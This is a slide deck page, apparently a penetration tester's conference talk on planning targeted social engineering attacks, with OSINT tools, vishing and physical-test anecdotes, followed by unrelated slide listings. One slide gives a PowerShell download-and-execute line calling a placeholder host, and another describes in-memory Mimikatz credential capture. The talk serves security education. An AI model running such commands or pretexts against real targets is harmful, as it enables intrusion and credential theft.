social imagineering
play

SOCIAL IMAGINEERING Hello. Aloha. Hola. Konnichiwa. Ciao. Bonjour. - PowerPoint PPT Presentation

Jul 12, 2023 •195 likes •423 views

SOCIAL IMAGINEERING Hello. Aloha. Hola. Konnichiwa. Ciao. Bonjour. Crafting Targeted Social Engineering Attacks leapsecurity.io @LeapSecurity LEAP SECURITY Confidential. Not to be copied, distributed or reproduced without prior written

  1. SOCIAL IMAGINEERING Hello. Aloha. Hola. Kon’nichiwa. Ciao. Bonjour. Crafting Targeted Social Engineering Attacks leapsecurity.io @LeapSecurity LEAP SECURITY Confidential. Not to be copied, distributed or reproduced without prior written approval.

  2. Ex Experience • Founder of Leap Security Inc. • Security Consultant/Penetration Tester • Forensic Analyst Pu Publica cations • Featured on security magazines • Hackin9, Pentest Magazine, ACAMS Sp Speaker • Conferences across the nation Tools To • InSpy, Pastepwnd, CredCrack @jonathanbroche @LeapSecurity leapsecurity.io // //

  3. Social Engineering @jonathanbroche @LeapSecurity leapsecurity.io // //

  4. Definition • The act of manipulating an individual(s) to obtain X • X is an object or information @jonathanbroche @LeapSecurity leapsecurity.io // //

  5. What’s changed? • Education • Awareness (sorta) • It’s gotten easier for the bad guys too. • Don’t speak English? No problem. • Services to proof read and spell check malicious phishing emails • Not tech savvy? No problem. • Exploit and Ransomware Kits being sold for $500 @jonathanbroche @LeapSecurity leapsecurity.io // //

  6. Attack Methodology Information Gathering Attack Exploitation Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  7. Attack Methodology (Cont.) • Information Gathering Information • Google, Bing, Shodan Gathering • Social Media – LinkedIn/Twitter/Facebook • Metadata • Surveillance (Physical Intel) Attack Exploitation Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  8. Attack Methodology (Cont.) • OSINT Favorites • HaveIBeenPwn • https://haveibeenpwned.com/ • OSINT Framework • https://osintframework.com/ • Intel Tools • https://inteltechniques.com/ • Dragnet • https://github.com/tevora- threat/Dragnet @jonathanbroche @LeapSecurity leapsecurity.io // //

  9. Pastepwnd Demo https://github.com/leapsecurity/Pastepwnd @jonathanbroche @LeapSecurity leapsecurity.io // //

  10. Attack Methodology (Cont.) • Attack Preparation Information • Get to know your target Gathering • Pick a persona to impersonate • Obtain target email signature • Build, Buy, or Prepare Tools • Spoof Services • Circumvent defensive technologies Attack Exploitation • Entice users with rewards Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  11. @jonathanbroche @LeapSecurity leapsecurity.io // //

  12. InSpy Demo https://github.com/leapsecurity/InSpy @jonathanbroche @LeapSecurity leapsecurity.io // //

  13. Attack Methodology (Cont.) • Exploitation Information • Slow and steady Gathering • Lateral movement • Sensitive data or objective • Exfiltration Attack Exploitation Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  14. Common Exploit Techniques • HTA – HTML Applications can be embedded on website • Macros • Executables @jonathanbroche @LeapSecurity leapsecurity.io // //

  15. Common Exploit Techniques (Cont.) • PowerShell • IEX (New-Object Net.WebClient). DownloadString ('http://badhost/hackerscript.ps1’) • C# • Visual Basic @jonathanbroche @LeapSecurity leapsecurity.io // //

  16. PS DownloadString functionality example • Logged into workstations via SMB • Use PowerShell script in memory to capture cleartext credentials using Mimikatz (Wdigest) • Until it found a domain administrator account @jonathanbroche @LeapSecurity leapsecurity.io // //

  17. Example: Vishing • Targeted Customer Service Representatives within the Bank • Impersonated contractor working with help desk • Obtained help desk extension • Discovered MobileIron • Called Help Desk and obtained AD account @jonathanbroche @LeapSecurity leapsecurity.io // //

  18. Example: Spear Phishing • Custom website (HTML, CSS, JS, PHP) • Rebrand scenario @jonathanbroche @LeapSecurity leapsecurity.io // //

  19. Example: Physical Test • Cold brrr, no snow brush • Responder, cracked NTLM hashes • Became friends with security guard • Became best friends with employee and got a tour of the facility @jonathanbroche @LeapSecurity leapsecurity.io // //

  20. Closing and Questions @jonathanbroche @LeapSecurity leapsecurity.io // //

  21. Hello. Aloha. Hola. Kon’nichiwa. Ciao. Bonjour. Thank you!!! @jonathanbroche @LeapSecurity leapsecurity.io // // LEAP SECURITY Confidential. Not to be copied, distributed or reproduced without prior written approval.

Recommend

Healthcare Re - Imagineering How disruptive technology will help to transform healthcare

Healthcare Re - Imagineering How disruptive technology will help to transform healthcare

Healthcare Re - Imagineering How disruptive technology will help to transform healthcare Agenda Brief Introduction Why data is essential to healthcare delivery transformation What can be done to make the best use of your data ED

269 views • 26 slides
Getting Social What is social media? Why does social media matter? What social media

Getting Social What is social media? Why does social media matter? What social media

pwcom .co.uk CIOB Hertfordshire March 2012 Who am I? Getting Social What is social media? Why does social media matter? What social media tools can we apply in construction? How do we start? Paul Wilkinson

396 views • 18 slides
The role of Social Work in end of life planning What is Social Work? Social work is a

The role of Social Work in end of life planning What is Social Work? Social work is a

The role of Social Work in end of life planning What is Social Work? Social work is a practice-based profession and an academic discipline that facilitates social change and development, social cohesion, and the empowerment and liberation of

348 views • 11 slides
FROM SOCIAL CAPITAL TO SOCIAL MOBILITY: LIMITATIONS AND OPPORTUNITIES OF SOCIAL SUPPORT AND

FROM SOCIAL CAPITAL TO SOCIAL MOBILITY: LIMITATIONS AND OPPORTUNITIES OF SOCIAL SUPPORT AND

FROM SOCIAL CAPITAL TO SOCIAL MOBILITY: LIMITATIONS AND OPPORTUNITIES OF SOCIAL SUPPORT AND SOCIAL LEVRAGE NETWORKS AMONG POOR FEMALE HOUSEHOLD HEADS IN SRI LANKA Kumudika Boyagoda PhD Candidate NIDEA, University of Waikato

262 views • 12 slides
Social Entrepreneurship Caravan Social entrepreneurship aims at solving social problems by

Social Entrepreneurship Caravan Social entrepreneurship aims at solving social problems by

Social Entrepreneurship Caravan Social entrepreneurship aims at solving social problems by developing new services, products or models. Social enterprises generate revenues and have profits while they are working for realizing their social

216 views • 19 slides
Studying Social Policy at Salford What is Social Policy? What is social policy? Society

Studying Social Policy at Salford What is Social Policy? What is social policy? Society

Studying Social Policy at Salford What is Social Policy? What is social policy? Society Politics Social policy seeks to understand the ways in Economy which social issues and government policies impact on peoples well - being A

469 views • 25 slides
Social networking platforms Social media refers to the means of interactions among people in which

Social networking platforms Social media refers to the means of interactions among people in which

4/30/2013 * a)I dont really know what Social Media means b) None (but I know what Social Media means) # c) 1 Social Media Network d) 2 Social Media Networks @Seth Bokser, MD, MPH Associate Clinical Professor, UCSF Medical School e) 3 or

578 views • 8 slides
Social Security: An Overview For the National Academy of Social Insurance Demystifying Social

Social Security: An Overview For the National Academy of Social Insurance Demystifying Social

Social Security: An Overview For the National Academy of Social Insurance Demystifying Social Security: Academy for Interns July 22, 2010 Joni Lavery, Social Science Research Analyst Social Security Administration Office of Retirement Policy,

511 views • 16 slides
SOCIAL PROGRESS INDEX SOCIAL SOCIAL PROGRESS PROGRESS IMPERATIVE IMPERATIVE Social Progress

SOCIAL PROGRESS INDEX SOCIAL SOCIAL PROGRESS PROGRESS IMPERATIVE IMPERATIVE Social Progress

SOCIAL PROGRESS INDEX SOCIAL SOCIAL PROGRESS PROGRESS IMPERATIVE IMPERATIVE Social Progress Index #socialprogress 2 ADVISORY BOARD Judith Rodin Hernando de Soto Michael E. Porter, President, The Rockefeller President, Institute for Chair

429 views • 16 slides
ANNEXES Social Responsibility Comes First 1 SOCIAL RESPONSIBILITY SOCIAL RESPONSIBILITY IS ONE OF

ANNEXES Social Responsibility Comes First 1 SOCIAL RESPONSIBILITY SOCIAL RESPONSIBILITY IS ONE OF

GEOX GROUP - 1Q20 SALES - MAY 7, 2020 ANNEXES Social Responsibility Comes First 1 SOCIAL RESPONSIBILITY SOCIAL RESPONSIBILITY IS ONE OF GEOXS FUNDAMENTAL VALUES AND THE GROUP HAS IMPLEMENTED A NUMBER OF IMPORTANT MEASURES TO PROTECT ITS

513 views • 17 slides
European Social Economy Regions 2019 1 What is Social Economy ? Social economy is an

European Social Economy Regions 2019 1 What is Social Economy ? Social economy is an

European Social Economy Regions 2019 1 What is Social Economy ? Social economy is an important part of the European socio-economic model. It includes a large variety of stakeholders such as cooperatives, foundations, social

668 views • 14 slides
SOCIAL SECURITY: WHAT YOU NEED TO KNOW Topics: What is Social Security? Will Social Security

SOCIAL SECURITY: WHAT YOU NEED TO KNOW Topics: What is Social Security? Will Social Security

SOCIAL SECURITY: WHAT YOU NEED TO KNOW Topics: What is Social Security? Will Social Security Be There For Me? How Do We Earn Credits? Who Can Get Benefits? When Should I Retire? How Do I Apply? What About Medicare? What is Social

578 views • 44 slides
Is a social network users behavior unique? 2 1 8/9/14 Has social data made

Is a social network users behavior unique? 2 1 8/9/14 Has social data made

8/9/14 Social Fingerprinting: Identifying Users of Social Networks by their Data Footprint The University of Tennessee Electrical Engineering and Computer Science Dissertation Defense Denise Koessler Gosnell Is a social network

458 views • 31 slides
Social Studies November 15, 2016 New York States Defined Purpose of Social Studies Social

Social Studies November 15, 2016 New York States Defined Purpose of Social Studies Social

Social Studies November 15, 2016 New York States Defined Purpose of Social Studies Social Studies is intended to promote civic competence through the integrated study of the social sciences and humanities. Within the school program, Social

469 views • 25 slides
What is Social Media? noun: social media ; plural noun: social medias websites and

What is Social Media? noun: social media ; plural noun: social medias websites and

What is Social Media? noun: social media ; plural noun: social medias websites and applications that enable users to create and share content or to participate in social networking. According to Google by the year 2025 all food

498 views • 21 slides
Kids and Social Networking Introduction Kids and Social Networking Social Networking sites play

Kids and Social Networking Introduction Kids and Social Networking Social Networking sites play

Learwood Middle School Parent Handbook Kids and Social Networking Introduction Kids and Social Networking Social Networking sites play an important role in connecting the lives of people. Research has shown that social media is the preferred

542 views • 9 slides
Social value: Where we are and looking forward

Social value: Where we are and looking forward

Social value: Where we are and looking forward _________________________________________________________________________________________________________ Social value roundtable discussion events: For the social enterprise sector 12th October

256 views • 7 slides
The Social Impact Equation Kevin Kelly School for Social Enterprises in Ireland Masterclass Two

The Social Impact Equation Kevin Kelly School for Social Enterprises in Ireland Masterclass Two

The Social Impact Equation Kevin Kelly School for Social Enterprises in Ireland Masterclass Two Early October (TBC) Financial versus Social David Floyd The Social Spider 1000 Bursaries for the 2016 Advanced Diploma in Social Enterprise

932 views • 69 slides
Social institutions, social policy and Social Policy and Politics redistributive poverty

Social institutions, social policy and Social Policy and Politics redistributive poverty

UNI TED NATI ONS RESEARCH I NSTI TUTE FOR SOCI AL DEVELOPMENT C OMBATING P OVERTY AND I NEQUALITY Structural Change, Social institutions, social policy and Social Policy and Politics redistributive poverty reduction Sarah Cook UNRISD UNDESA,

333 views • 22 slides
Fut Futur ure P Priorities fo for Mount Dennis (a worki king draft) Presentation to Urban

Fut Futur ure P Priorities fo for Mount Dennis (a worki king draft) Presentation to Urban

Fut Futur ure P Priorities fo for Mount Dennis (a worki king draft) Presentation to Urban Land Institute Community Imagineering Program November 17, 2018 Simon Chamberlain, Secretary to the Board Mount Dennis Community Association Ma

211 views • 9 slides
SOCI 210: Sociological Perspectives Nov. 3 1. Social Change 2. Collective behavior 3. Social

SOCI 210: Sociological Perspectives Nov. 3 1. Social Change 2. Collective behavior 3. Social

SOCI 210: Sociological Perspectives Nov. 3 1. Social Change 2. Collective behavior 3. Social movements 1 Social Change 2 Social change Social rigidity Social change Empirically, social Much of what sociologists structures do

231 views • 10 slides
Tescos Hip-Hop for social cohesion, social change and social awareness. 20 Years + Career

Tescos Hip-Hop for social cohesion, social change and social awareness. 20 Years + Career

KMTs STORY Your will be working in Tescos Hip-Hop for social cohesion, social change and social awareness. 20 Years + Career Rec econ onne nect ctin ing g ur urba ban n co comm mmun unit itie ies s with nature

485 views • 21 slides
Social Media for Mason AGENDA What is Social Media Social Media Strategy Content

Social Media for Mason AGENDA What is Social Media Social Media Strategy Content

Social Media for Mason AGENDA What is Social Media Social Media Strategy Content Return on Investment (ROI) Forthcoming Policy Resources and Tools What is Social Media? What is social media? Thanks, Kathy. I could have

1.12k views • 35 slides
Social Media donts What is social media Social media is nothing new Just an extension

Social Media donts What is social media Social media is nothing new Just an extension

Steven Anderson Digital Manager MAS 15:00 - 15:30 Social Media Do's and Don'ts Dos and Social Media donts What is social media Social media is nothing new Just an extension of something we all have a social network Its

452 views • 18 slides

More recommend